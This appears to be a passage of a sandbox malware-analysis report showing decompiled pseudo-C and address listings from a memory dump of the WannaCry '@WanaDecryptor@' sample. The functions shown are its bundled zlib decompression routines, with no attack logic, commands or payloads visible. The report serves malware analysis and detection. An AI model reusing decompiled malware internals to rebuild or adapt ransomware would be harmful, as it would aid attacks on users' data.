										if(__eax != 0) {
											goto L62;
										} else {
											__eax =  *(__esi + 0x2c);
											 *(__esp + 0x18) = __eax;
											if(__edx != __eax) {
												L52:
												 *(__esi + 0x34) = __edx;
												__edx =  *(__esp + 0x30);
												_push( *(__esp + 0x30));
												_push(__edi);
												_push(__esi);
												__eax = E0040DDA0();
												__edx =  *(__esi + 0x34);
												 *(__esp + 0x3c) = __eax;
												__eax =  *(__esi + 0x30);
												__esp = __esp + 0xc;
												 *(__esp + 0x20) = __eax;
												if(__edx >= __eax) {
													__eax =  *(__esi + 0x2c);
													__eax =  *(__esi + 0x2c) - __edx;
												} else {
													__eax = __eax - __edx;
													__eax = __eax - 1;
												}
												__ecx =  *(__esi + 0x2c);
												 *(__esp + 0x14) = __eax;
												 *(__esp + 0x18) = __ecx;
												if(__edx == __ecx) {
													__ecx =  *(__esi + 0x28);
													__eax =  *(__esp + 0x20);
													if(__eax == __ecx) {
														__eax =  *(__esp + 0x14);
													} else {
														__edx = __ecx;
														if(__edx >= __eax) {
															__eax =  *(__esp + 0x18);
															__eax =  *(__esp + 0x18) - __edx;
														} else {
															__eax = __eax - __edx;
															__eax = __eax - 1;
														}
													}
												}
												if(__eax == 0) {
													goto L91;
												} else {
													goto L62;
												}
											} else {
												__eax =  *(__esi + 0x30);
												__ecx =  *(__esi + 0x28);
												if(__eax == __ecx) {
													goto L52;
												} else {
													__edx = __ecx;
													if(__edx >= __eax) {
														__eax =  *(__esp + 0x18);
														__eax =  *(__esp + 0x18) - __edx;
													} else {
														__eax = __eax - __edx;
														__eax = __eax - 1;
													}
													if(__eax != 0) {
														goto L62;
													} else {
														goto L52;
													}
												}
											}
										}
										goto L99;
										L62:
										__ecx =  *(__esp + 0x1c);
										__edx = __edx + 1;
										 *(__esp + 0x30) = 0;
										__cl =  *( *(__esp + 0x1c));
										 *(__edx - 1) = __cl;
										__ecx =  *(__esp + 0x1c);
										__ecx =  *(__esp + 0x1c) + 1;
										__eax = __eax - 1;
										 *(__esp + 0x1c) = __ecx;
										 *(__esp + 0x14) = __eax;
										if(__ecx ==  *(__esi + 0x2c)) {
											__ecx =  *(__esi + 0x28);
											 *(__esp + 0x1c) =  *(__esi + 0x28);
										}
										__ecx =  *(__esp + 0x10);
										_t212 = __ecx + 4;
										 *_t212 =  *(__ecx + 4) - 1;
									} while ( *_t212 != 0);
								}
								goto L84;
							case 6:
								if(__eax != 0) {
									L83:
									__ecx =  *(__esp + 0x10);
									__edx = __edx + 1;
									__eax = __eax - 1;
									 *(__esp + 0x30) = 0;
									__cl =  *( *(__esp + 0x10) + 8);
									 *(__esp + 0x14) = __eax;
									 *(__edx - 1) = __cl;
									__ecx =  *(__esp + 0x10);
									L84:
									 *__ecx = 0;
									goto L85;
								} else {
									__eax =  *(__esi + 0x2c);
									 *(__esp + 0x18) = __eax;
									if(__edx != __eax) {
										L73:
										 *(__esi + 0x34) = __edx;
										__edx =  *(__esp + 0x30);
										_push( *(__esp + 0x30));
										_push(__edi);
										_push(__esi);
										__eax = E0040DDA0();
										__edx =  *(__esi + 0x34);
										 *(__esp + 0x3c) = __eax;
										__eax =  *(__esi + 0x30);
										__esp = __esp + 0xc;
										 *(__esp + 0x20) = __eax;
										if(__edx >= __eax) {
											__eax =  *(__esi + 0x2c);
											__eax =  *(__esi + 0x2c) - __edx;
										} else {
											__eax = __eax - __edx;
											__eax = __eax - 1;
										}
										__ecx =  *(__esi + 0x2c);
										 *(__esp + 0x14) = __eax;
										 *(__esp + 0x18) = __ecx;
										if(__edx == __ecx) {
											__ecx =  *(__esi + 0x28);
											__eax =  *(__esp + 0x20);
											if(__eax == __ecx) {
												__eax =  *(__esp + 0x14);
											} else {
												__edx = __ecx;
												if(__edx >= __eax) {
													__eax =  *(__esp + 0x18);
													__eax =  *(__esp + 0x18) - __edx;
												} else {
													__eax = __eax - __edx;
													__eax = __eax - 1;
												}
											}
										}
										if(__eax == 0) {
											L91:
											__eax =  *(__esp + 0x28);
											__ecx =  *(__esp + 0x2c);
											 *(__esi + 0x20) =  *(__esp + 0x28);
											 *(__esi + 0x1c) = __ebx;
											__ebx =  *__edi;
											__eax = __ebp;
											__edi[1] =  *(__esp + 0x2c);
											__ecx = __edi[2];
											__eax = __ebp -  *__edi;
											 *__edi = __ebp;
											__ecx = __edi[2] + __ebp -  *__edi;
											__edi[2] = __edi[2] + __ebp -  *__edi;
											__ecx =  *(__esp + 0x30);
											_push( *(__esp + 0x30));
											_push(__edi);
											_push(__esi);
											 *(__esi + 0x34) = __edx;
											__eax = E0040DDA0();
											__esp = __esp + 0xc;
											return __eax;
										} else {
											goto L83;
										}
									} else {
										__eax =  *(__esi + 0x30);
										__ecx =  *(__esi + 0x28);
										if(__eax == __ecx) {
											goto L73;
										} else {
											__edx = __ecx;
											if(__edx >= __eax) {
												__eax =  *(__esp + 0x18);
												__eax =  *(__esp + 0x18) - __edx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											if(__eax != 0) {
												goto L83;
											} else {
												goto L73;
											}
										}
									}
								}
								goto L99;
							case 7:
								if(__ebx > 7) {
									__ecx =  *(__esp + 0x2c);
									__ebx = __ebx - 8;
									__ecx =  *(__esp + 0x2c) + 1;
									__ebp = __ebp - 1;
									 *(__esp + 0x2c) =  *(__esp + 0x2c) + 1;
								}
								 *(__esi + 0x34) = __edx;
								__edx =  *(__esp + 0x30);
								_push( *(__esp + 0x30));
								_push(__edi);
								_push(__esi);
								__eax = E0040DDA0();
								__edx =  *(__esi + 0x34);
								__ecx =  *(__esi + 0x30);
								__esp = __esp + 0xc;
								if( *(__esi + 0x30) == __edx) {
									__eax =  *(__esp + 0x10);
									 *( *(__esp + 0x10)) = 8;
									goto L97;
								} else {
									__ecx =  *(__esp + 0x28);
									 *(__esi + 0x1c) = __ebx;
									 *(__esi + 0x20) =  *(__esp + 0x28);
									__ecx =  *(__esp + 0x2c);
									__ebx =  *__edi;
									__edi[1] =  *(__esp + 0x2c);
									__ecx = __ebp;
									_push(__eax);
									__ecx = __ebp -  *__edi;
									__edi[2] = __edi[2] + __ebp -  *__edi;
									_push(__edi);
									__edi[2] = __edi[2] + __ebp -  *__edi;
									 *__edi = __ebp;
									_push(__esi);
									 *(__esi + 0x34) = __edx;
									__eax = E0040DDA0();
									__esp = __esp + 0xc;
									return __eax;
								}
								goto L99;
							case 8:
								L97:
								__ecx =  *(__esp + 0x28);
								__eax =  *(__esp + 0x2c);
								 *(__esi + 0x20) =  *(__esp + 0x28);
								 *(__esi + 0x1c) = __ebx;
								__ebx =  *__edi;
								__ecx = __ebp;
								__edi[1] =  *(__esp + 0x2c);
								__eax = __edi[2];
								__ecx = __ebp -  *__edi;
								_push(1);
								__eax = __edi[2] + __ebp -  *__edi;
								_push(__edi);
								__edi[2] = __edi[2] + __ebp -  *__edi;
								 *__edi = __ebp;
								_push(__esi);
								 *(__esi + 0x34) = __edx;
								__eax = E0040DDA0();
								__esp = __esp + 0xc;
								return __eax;
								goto L99;
							case 9:
								__eax =  *(__esp + 0x28);
								__ecx =  *(__esp + 0x2c);
								 *(__esi + 0x20) =  *(__esp + 0x28);
								 *(__esi + 0x1c) = __ebx;
								__ebx =  *__edi;
								__eax = __ebp;
								__edi[1] =  *(__esp + 0x2c);
								__ecx = __edi[2];
								__eax = __ebp -  *__edi;
								_push(0xfffffffd);
								__ecx = __edi[2] + __ebp -  *__edi;
								_push(__edi);
								__edi[2] = __edi[2] + __ebp -  *__edi;
								 *__edi = __ebp;
								_push(__esi);
								 *(__esi + 0x34) = __edx;
								__eax = E0040DDA0();
								__esp = __esp + 0xc;
								return __eax;
								goto L99;
						}
						L85:
						_t362 =  *( *(_t412 + 0x10));
					} while (_t362 <= 9);
					goto L86;
				}
				L99:
			}

0x0040df36
0x0040df3b
0x0040df42
0x0040df48
0x0040df4a
0x0040df4d
0x0040df51
0x0040df54
0x0040df58
0x0040df5b
0x0040df61
0x0040df6b
0x0040df63
0x0040df65
0x0040df65
0x0040df6d
0x0040df6f
0x0040df76
0x0040e4e7
0x0040e4ef
0x0040e4f2
0x0040e4f9
0x0040e501
0x0040e505
0x0040e506
0x0040e509
0x0040e50b
0x0040e50c
0x0040e51e
0x0040df7c
0x0040df7c
0x0040df7c
0x00000000
0x0040df88
0x0040e02c
0x0040e02c
0x0040e035
0x0040e03b
0x0040e041
0x00000000
0x0040df99
0x0040dfa1
0x0040dfa4
0x0040dfab
0x0040dfb3
0x0040dfb7
0x0040dfbb
0x0040dfbe
0x0040dfc7
0x0040dfc8
0x0040dfc9
0x0040dfca
0x0040dfd5
0x0040dfd6
0x0040dfd7
0x0040dfe2
0x0040dfe4
0x0040dfe7
0x0040dfeb
0x0040dfee
0x0040dff2
0x0040dff5
0x0040dffa
0x0040dffe
0x0040e008
0x0040e000
0x0040e002
0x0040e002
0x0040e00c
0x0040e010
0x00000000
0x0040e012
0x0040e019
0x0040e021
0x0040e023
0x00000000
0x0040e023
0x0040e010
0x00000000
0x00000000
0x0040e044
0x0040e048
0x0040e04d
0x0040e051
0x0040e08d
0x0040e0a1
0x0040e0a6
0x0040e0b3
0x0040e0b7
0x0040e0bd
0x0040e0c1
0x0040e0c5
0x0040e0c9
0x0040e0e6
0x0040e10d
0x00000000
0x0040e113
0x0040e115
0x0040e119
0x0040e51f
0x0040e525
0x00000000
0x0040e11f
0x0040e11f
0x0040e125
0x00000000
0x0040e125
0x0040e119
0x0040e0e8
0x0040e0e8
0x0040e0ef
0x0040e0f9
0x0040e0ff
0x0040e102
0x00000000
0x0040e102
0x0040e0cb
0x0040e0cb
0x0040e0d2
0x0040e0d5
0x0040e0db
0x00000000
0x0040e0db
0x0040e053
0x0040e053
0x0040e053
0x0040e059
0x00000000
0x00000000
0x0040e065
0x0040e06d
0x0040e073
0x0040e076
0x0040e080
0x0040e084
0x0040e087
0x0040e08b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e08b
0x00000000
0x0040e053
0x00000000
0x00000000
0x0040e12e
0x0040e132
0x0040e137
0x0040e13b
0x0040e175
0x0040e175
0x0040e17c
0x0040e180
0x0040e182
0x0040e186
0x0040e189
0x0040e191
0x0040e193
0x0040e197
0x0040e199
0x0040e19b
0x0040e19f
0x0040e1a1
0x0040e1a4
0x0040e1aa
0x0040e1ad
0x0040e1b0
0x00000000
0x0040e13d
0x0040e13d
0x0040e13d
0x0040e143
0x00000000
0x00000000
0x0040e149
0x0040e14a
0x0040e14c
0x0040e150
0x0040e152
0x0040e155
0x0040e158
0x0040e15a
0x0040e15e
0x0040e166
0x0040e168
0x0040e16c
0x0040e16f
0x0040e173
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e173
0x00000000
0x0040e13d
0x00000000
0x00000000
0x0040e1b5
0x0040e1b9
0x0040e1b9
0x0040e1be
0x0040e1c2
0x0040e1fc
0x0040e1fc
0x0040e203
0x0040e207
0x0040e20d
0x0040e210
0x0040e213
0x0040e215
0x0040e219
0x0040e220
0x0040e222
0x0040e226
0x0040e22a
0x0040e22c
0x0040e230
0x0040e232
0x0040e234
0x0040e238
0x0040e25f
0x0040e569
0x0040e56d
0x0040e573
0x0040e57a
0x0040e582
0x0040e585
0x0040e58c
0x0040e594
0x0040e598
0x0040e599
0x0040e59c
0x0040e59e
0x0040e59f
0x0040e5b1
0x0040e265
0x0040e265
0x0040e269
0x0040e27a
0x0040e27d
0x00000000
0x0040e27d
0x0040e23a
0x0040e23a
0x0040e23e
0x0040e241
0x0040e248
0x0040e24b
0x0040e251
0x0040e254
0x00000000
0x0040e254
0x0040e1c4
0x0040e1c4
0x0040e1c4
0x0040e1ca
0x00000000
0x00000000
0x0040e1d0
0x0040e1d1
0x0040e1d3
0x0040e1d7
0x0040e1d9
0x0040e1dc
0x0040e1df
0x0040e1e1
0x0040e1e5
0x0040e1ed
0x0040e1ef
0x0040e1f3
0x0040e1f6
0x0040e1fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e1fa
0x00000000
0x0040e1c4
0x00000000
0x00000000
0x0040e286
0x0040e28a
0x0040e28f
0x0040e293
0x0040e2cf
0x0040e2cf
0x0040e2d6
0x0040e2da
0x0040e2dc
0x0040e2e0
0x0040e2e3
0x0040e2eb
0x0040e2ed
0x0040e2f1
0x0040e2f3
0x0040e2f5
0x0040e2f9
0x00000000
0x0040e295
0x0040e295
0x0040e295
0x0040e29b
0x00000000
0x00000000
0x0040e2a1
0x0040e2a3
0x0040e2a4
0x0040e2a7
0x0040e2ab
0x0040e2ad
0x0040e2af
0x0040e2b1
0x0040e2b5
0x0040e2b8
0x0040e2c0
0x0040e2c2
0x0040e2c6
0x0040e2c9
0x0040e2cd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e2cd
0x0040e52e
0x0040e532
0x0040e535
0x0040e541
0x0040e54a
0x0040e54c
0x0040e54f
0x0040e556
0x0040e557
0x0040e558
0x0040e568
0x0040e568
0x00000000
0x00000000
0x0040e2ff
0x0040e2ff
0x0040e303
0x0040e305
0x0040e308
0x0040e30d
0x0040e311
0x0040e313
0x0040e316
0x0040e318
0x0040e31c
0x0040e326
0x0040e326
0x0040e328
0x0040e32d
0x00000000
0x00000000
0x0040e322
0x0040e322
0x0040e32f
0x0040e32f
0x0040e333
0x0040e337
0x0040e33c
0x0040e340
0x0040e346
0x0040e348
0x00000000
0x0040e34e
0x0040e34e
0x0040e353
0x0040e357
0x0040e378
0x0040e378
0x0040e37b
0x0040e37f
0x0040e380
0x0040e381
0x0040e382
0x0040e387
0x0040e38a
0x0040e38e
0x0040e391
0x0040e396
0x0040e39a
0x0040e3a1
0x0040e3a4
0x0040e39c
0x0040e39c
0x0040e39e
0x0040e39e
0x0040e3a6
0x0040e3a9
0x0040e3af
0x0040e3b3
0x0040e3b5
0x0040e3b8
0x0040e3be
0x0040e3d3
0x0040e3c0
0x0040e3c0
0x0040e3c4
0x0040e3cb
0x0040e3cf
0x0040e3c6
0x0040e3c6
0x0040e3c8
0x0040e3c8
0x0040e3c4
0x0040e3be
0x0040e3d9
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e359
0x0040e359
0x0040e35c
0x0040e361
0x00000000
0x0040e363
0x0040e363
0x0040e367
0x0040e36e
0x0040e372
0x0040e369
0x0040e369
0x0040e36b
0x0040e36b
0x0040e376
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e376
0x0040e361
0x0040e357
0x00000000
0x0040e3df
0x0040e3df
0x0040e3e3
0x0040e3e4
0x0040e3ec
0x0040e3ee
0x0040e3f1
0x0040e3f5
0x0040e3f6
0x0040e3fa
0x0040e3fe
0x0040e402
0x0040e404
0x0040e407
0x0040e407
0x0040e40b
0x0040e40f
0x0040e40f
0x0040e40f
0x0040e418
0x00000000
0x00000000
0x0040e41f
0x0040e4b6
0x0040e4b6
0x0040e4ba
0x0040e4bb
0x0040e4bc
0x0040e4c4
0x0040e4c7
0x0040e4cb
0x0040e4ce
0x0040e4d2
0x0040e4d2
0x00000000
0x0040e425
0x0040e425
0x0040e42a
0x0040e42e
0x0040e44f
0x0040e44f
0x0040e452
0x0040e456
0x0040e457
0x0040e458
0x0040e459
0x0040e45e
0x0040e461
0x0040e465
0x0040e468
0x0040e46d
0x0040e471
0x0040e478
0x0040e47b
0x0040e473
0x0040e473
0x0040e475
0x0040e475
0x0040e47d
0x0040e480
0x0040e486
0x0040e48a
0x0040e48c
0x0040e48f
0x0040e495
0x0040e4aa
0x0040e497
0x0040e497
0x0040e49b
0x0040e4a2
0x0040e4a6
0x0040e49d
0x0040e49d
0x0040e49f
0x0040e49f
0x0040e49b
0x0040e495
0x0040e4b0
0x0040e5b2
0x0040e5b2
0x0040e5b6
0x0040e5ba
0x0040e5bd
0x0040e5c0
0x0040e5c2
0x0040e5c4
0x0040e5c7
0x0040e5ca
0x0040e5cc
0x0040e5ce
0x0040e5d0
0x0040e5d3
0x0040e5d7
0x0040e5d8
0x0040e5d9
0x0040e5da
0x0040e5dd
0x0040e5e2
0x0040e5ec
0x00000000
0x00000000
0x00000000
0x0040e430
0x0040e430
0x0040e433
0x0040e438
0x00000000
0x0040e43a
0x0040e43a
0x0040e43e
0x0040e445
0x0040e449
0x0040e440
0x0040e440
0x0040e442
0x0040e442
0x0040e44d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e44d
0x0040e438
0x0040e42e
0x00000000
0x00000000
0x0040e5f0
0x0040e5f2
0x0040e5f6
0x0040e5f9
0x0040e5fa
0x0040e5fb
0x0040e5fb
0x0040e5ff
0x0040e602
0x0040e606
0x0040e607
0x0040e608
0x0040e609
0x0040e60e
0x0040e611
0x0040e614
0x0040e619
0x0040e652
0x0040e656
0x00000000
0x0040e61b
0x0040e61b
0x0040e61f
0x0040e622
0x0040e625
0x0040e629
0x0040e62b
0x0040e62e
0x0040e630
0x0040e631
0x0040e636
0x0040e638
0x0040e639
0x0040e63c
0x0040e63e
0x0040e63f
0x0040e642
0x0040e647
0x0040e651
0x0040e651
0x00000000
0x00000000
0x0040e65c
0x0040e65c
0x0040e660
0x0040e664
0x0040e667
0x0040e66a
0x0040e66c
0x0040e66e
0x0040e671
0x0040e674
0x0040e676
0x0040e678
0x0040e67a
0x0040e67b
0x0040e67e
0x0040e680
0x0040e681
0x0040e684
0x0040e689
0x0040e693
0x00000000
0x00000000
0x0040e694
0x0040e698
0x0040e69c
0x0040e69f
0x0040e6a2
0x0040e6a4
0x0040e6a6
0x0040e6a9
0x0040e6ac
0x0040e6ae
0x0040e6b0
0x0040e6b2
0x0040e6b3
0x0040e6b6
0x0040e6b8
0x0040e6b9
0x0040e6bc
0x0040e6c1
0x0040e6cb
0x00000000
0x00000000
0x0040e4d8
0x0040e4dc
0x0040e4de
0x00000000
0x0040df7c
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b8eabf12bd29c3c38fc8e7bc8212d9d6bf0432072041c2816a53c5bd799d9a5
Instruction ID: e5ae74944e208cb03c60f72bb217c75502e03934b58f7a9b199ce6c2a9593854
Opcode Fuzzy Hash: 9b8eabf12bd29c3c38fc8e7bc8212d9d6bf0432072041c2816a53c5bd799d9a5
Instruction Fuzzy Hash: 5E2239B46083018FC308CF29D590A2ABBE1FF88354F148A6EE49AD7751D734E955CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00410460 Relevance: .4, Instructions: 377
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00410460(intOrPtr* _a4, signed int _a8) {
				signed int* _t124;
				signed int _t172;
				signed int _t176;
				signed int _t225;
				intOrPtr* _t229;
				signed int _t230;

				_t229 = _a4;
				if(_t229 == 0) {
					L36:
					return 0xfffffffe;
				} else {
					_t124 =  *(_t229 + 0x1c);
					if(_t124 != 0 &&  *_t229 != 0) {
						_t176 =  *_t124;
						_t225 = 0xfffffffb;
						_t172 = (0 | _a8 != 0x00000004) - 0x00000001 & 0xfffffffb;
						_a8 = _t172;
						if(_t176 <= 0xd) {
							_t230 = 5;
							do {
								switch( *((intOrPtr*)(_t176 * 4 +  &M00410860))) {
									case 0:
										_t177 =  *((intOrPtr*)(_t229 + 4));
										if(_t177 == 0) {
											goto L39;
										} else {
											 *((intOrPtr*)(_t229 + 4)) = _t177 - 1;
											_t225 = _t172;
											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
											_t124[1] = 0;
											_t126 =  *(_t229 + 0x1c);
											 *_t229 =  *_t229 + 1;
											if((_t126[1] & 0x0000000f) == 8) {
												if((_t126[1] >> 4) + 8 <= _t126[4]) {
													 *_t126 = 1;
													goto L12;
												} else {
													 *_t126 = 0xd;
													 *(_t229 + 0x18) = "invalid window size";
													goto L34;
												}
											} else {
												 *_t126 = 0xd;
												 *(_t229 + 0x18) = "unknown compression method";
												goto L34;
											}
										}
										goto L54;
									case 1:
										L12:
										_t127 =  *((intOrPtr*)(_t229 + 4));
										if(_t127 == 0) {
											goto L39;
										} else {
											 *((intOrPtr*)(_t229 + 4)) = _t127 - 1;
											_t225 = _t172;
											_t173 =  *(_t229 + 0x1c);
											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
											_t131 =  *_t229;
											_t188 =  *_t131;
											 *_t229 = _t131 + 1;
											if((_t173[1] << 8) % 0x1f == 0) {
												if((_t188 & 0x00000020) != 0) {
													_t174 = _a8;
													 *( *(_t229 + 0x1c)) = 2;
													goto L38;
												} else {
													 *_t173 = 7;
													_t172 = _a8;
													_t230 = 5;
													goto L35;
												}
											} else {
												 *_t173 = 0xd;
												_t172 = _a8;
												_t230 = 5;
												 *(_t229 + 0x18) = "incorrect header check";
												( *(_t229 + 0x1c))[1] = 5;
												goto L35;
											}
										}
										goto L54;
									case 2:
										L38:
										_t138 =  *((intOrPtr*)(_t229 + 4));
										if(_t138 != 0) {
											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
											 *((intOrPtr*)(_t229 + 4)) = _t138 - 1;
											_t226 = _t174;
											( *(_t229 + 0x1c))[2] = 0 << 0x18;
											 *_t229 =  *_t229 + 1;
											 *( *(_t229 + 0x1c)) = 3;
											goto L41;
										} else {
											goto L39;
										}
										goto L54;
									case 3:
										L41:
										_t143 =  *((intOrPtr*)(_t229 + 4));
										if(_t143 != 0) {
											 *((intOrPtr*)(_t229 + 4)) = _t143 - 1;
											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
											_t227 = _t174;
											( *(_t229 + 0x1c))[2] = ( *(_t229 + 0x1c))[2] + (0 << 0x10);
											 *_t229 =  *_t229 + 1;
											 *( *(_t229 + 0x1c)) = 4;
											goto L44;
										} else {
											return _t226;
										}
										goto L54;
									case 4:
										L44:
										_t150 =  *((intOrPtr*)(_t229 + 4));
										if(_t150 != 0) {
											 *((intOrPtr*)(_t229 + 4)) = _t150 - 1;
											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
											_t228 = _t174;
											( *(_t229 + 0x1c))[2] = ( *(_t229 + 0x1c))[2] + (0 << 8);
											 *_t229 =  *_t229 + 1;
											 *( *(_t229 + 0x1c)) = 5;
											goto L47;
										} else {
											return _t227;
										}
										goto L54;
									case 5:
										L47:
										_t158 =  *((intOrPtr*)(_t229 + 4));
										if(_t158 != 0) {
											 *((intOrPtr*)(_t229 + 4)) = _t158 - 1;
											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
											( *(_t229 + 0x1c))[2] = ( *(_t229 + 0x1c))[2];
											 *_t229 =  *_t229 + 1;
											_t163 =  *(_t229 + 0x1c);
											 *(_t229 + 0x30) = _t163[2];
											 *_t163 = 6;
											return 2;
										} else {
											return _t228;
										}
										goto L54;
									case 6:
										 *(__esi[7]) = 0xd;
										__eax = __esi[7];
										__esi[6] = "need dictionary";
										 *((intOrPtr*)(__esi[7] + 4)) = 0;
										__eax = 0xfffffffe;
										return 0xfffffffe;
										goto L54;
									case 7:
										_push(__edi);
										_push(__esi);
										_push( *((intOrPtr*)(__eax + 0x14)));
										__edi = E0040E840();
										__esp = __esp + 0xc;
										if(__edi != 0xfffffffd) {
											if(__edi == 0) {
												__edi = __ebx;
											}
											if(__edi != 1) {
												goto L39;
											} else {
												__eax = __esi[7];
												__edi = __ebx;
												__eax = E0040E720( *((intOrPtr*)(__esi[7] + 0x14)), __esi, __esi[7] + 4);
												__eax = __esi[7];
												if( *((intOrPtr*)(__eax + 0xc)) == 0) {
													 *__eax = 8;
													goto L25;
												} else {
													 *__eax = 0xc;
													goto L35;
												}
											}
										} else {
											 *(__esi[7]) = 0xd;
											__eax = __esi[7];
											 *((intOrPtr*)(__eax + 4)) = 0;
											goto L35;
										}
										goto L54;
									case 8:
										L25:
										__eax = __esi[1];
										if(__eax == 0) {
											goto L39;
										} else {
											__esi[1] = __eax;
											__esi[2] = __esi[2] + 1;
											__esi[2] = __esi[2] + 1;
											__eax =  *__esi;
											__edi = __ebx;
											 *(__esi[7] + 8) = 0 << 0x18;
											 *__esi =  *__esi + 1;
											 *__esi =  *__esi + 1;
											__eax = __esi[7];
											 *(__esi[7]) = 9;
											goto L27;
										}
										goto L54;
									case 9:
										L27:
										__eax = __esi[1];
										if(__eax == 0) {
											goto L39;
										} else {
											__eax = __eax - 1;
											__esi[2] = __esi[2] + 1;
											__esi[1] = __eax;
											__eax = __esi[7];
											__edi = __ebx;
											 *(__esi[7] + 8) =  *(__esi[7] + 8) + (0 << 0x10);
											 *__esi =  *__esi + 1;
											 *__esi =  *__esi + 1;
											__eax = __esi[7];
											 *(__esi[7]) = 0xa;
											goto L29;
										}
										goto L54;
									case 0xa:
										L29:
										__eax = __esi[1];
										if(__eax == 0) {
											goto L39;
										} else {
											__eax = __eax - 1;
											__esi[2] = __esi[2] + 1;
											__esi[1] = __eax;
											__eax = __esi[7];
											__edi = __ebx;
											 *(__esi[7] + 8) =  *(__esi[7] + 8) + (0 << 8);
											 *__esi =  *__esi + 1;
											 *__esi =  *__esi + 1;
											__eax = __esi[7];
											 *(__esi[7]) = 0xb;
											goto L31;
										}
										goto L54;
									case 0xb:
										L31:
										__eax = __esi[1];
										if(__eax == 0) {
											L39:
											return _t225;
										} else {
											__esi[1] = __eax;
											__eax = __esi[7];
											__esi[2] = __esi[2] + 1;
											__edi = __ebx;
											 *(__esi[7] + 8) =  *(__esi[7] + 8);
											 *__esi =  *__esi + 1;
											 *__esi =  *__esi + 1;
											__eax = __esi[7];
											if( *((intOrPtr*)(__eax + 4)) ==  *((intOrPtr*)(__eax + 8))) {
												 *(__esi[7]) = 0xc;
												goto L52;
											} else {
												 *__eax = 0xd;
												__esi[6] = "incorrect data check";
												L34:
												( *(_t229 + 0x1c))[1] = _t230;
												goto L35;
											}
										}
										goto L54;
									case 0xc:
										L52:
										__eax = 1;
										return 1;
										goto L54;
									case 0xd:
										__eax = 0xfffffffd;
										return 0xfffffffd;
										goto L54;
								}
								L35:
								_t124 =  *(_t229 + 0x1c);
								_t176 =  *_t124;
							} while (_t176 <= 0xd);
						}
					}
					goto L36;
				}
				L54:
			}

0x00410463
0x0041046a
0x0041070e
0x00410714
0x00410470
0x00410470
0x00410475
0x0041048d
0x00410493
0x00410498
0x0041049e
0x004104a2
0x004104a8
0x004104ad
0x004104ad
0x00000000
0x004104b4
0x004104b9
0x00000000
0x004104bf
0x004104c2
0x004104c9
0x004104cb
0x004104d2
0x004104d5
0x004104e4
0x004104e6
0x00410508
0x0041051c
0x00000000
0x0041050a
0x0041050a
0x00410510
0x00000000
0x00410510
0x004104e8
0x004104e8
0x004104ee
0x00000000
0x004104ee
0x004104e6
0x00000000
0x00000000
0x00410522
0x00410522
0x00410527
0x00000000
0x0041052d
0x00410530
0x00410537
0x00410539
0x0041053c
0x0041053f
0x00410548
0x0041054b
0x00410559
0x0041057f
0x00410718
0x00410721
0x00000000
0x00410585
0x00410585
0x0041058b
0x0041058f
0x00000000
0x0041058f
0x0041055b
0x0041055b
0x00410564
0x00410568
0x0041056d
0x00410574
0x00000000
0x00410574
0x00410559
0x00000000
0x00000000
0x00410727
0x00410727
0x0041072c
0x0041073c
0x00410741
0x00410749
0x0041074e
0x00410757
0x00410759
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041075f
0x0041075f
0x00410764
0x00410770
0x00410779
0x00410781
0x0041078b
0x00410794
0x00410796
0x00000000
0x00410766
0x0041076c
0x0041076c
0x00000000
0x00000000
0x0041079c
0x0041079c
0x004107a1
0x004107ad
0x004107b6
0x004107be
0x004107c8
0x004107ce
0x004107d3
0x00000000
0x004107a3
0x004107a9
0x004107a9
0x00000000
0x00000000
0x004107d5
0x004107d5
0x004107da
0x004107ea
0x004107f0
0x004107fd
0x00410803
0x00410805
0x0041080b
0x0041080f
0x0041081c
0x004107dc
0x004107e2
0x004107e2
0x00000000
0x00000000
0x00410821
0x00410827
0x0041082a
0x00410832
0x0041083a
0x00410840
0x00000000
0x00000000
0x0041059c
0x0041059d
0x0041059e
0x004105a4
0x004105a6
0x004105ac
0x004105c8
0x004105ca
0x004105ca
0x004105cf
0x00000000
0x004105d5
0x004105d5
0x004105d8
0x004105e3
0x004105e8
0x004105f3
0x00410600
0x00000000
0x004105f5
0x004105f5
0x00000000
0x004105f5
0x004105f3
0x004105ae
0x004105b1
0x004105b7
0x004105ba
0x00000000
0x004105ba
0x00000000
0x00000000
0x00410606
0x00410606
0x0041060b
0x00000000
0x00410611
0x00410615
0x0041061b
0x0041061e
0x00410621
0x00410623
0x0041062a
0x0041062f
0x00410630
0x00410632
0x00410635
0x00000000
0x00410635
0x00000000
0x00000000
0x0041063b
0x0041063b
0x00410640
0x00000000
0x00410646
0x0041064b
0x0041064d
0x00410650
0x00410653
0x0041065a
0x00410664
0x00410669
0x0041066a
0x0041066c
0x0041066f
0x00000000
0x0041066f
0x00000000
0x00000000
0x00410675
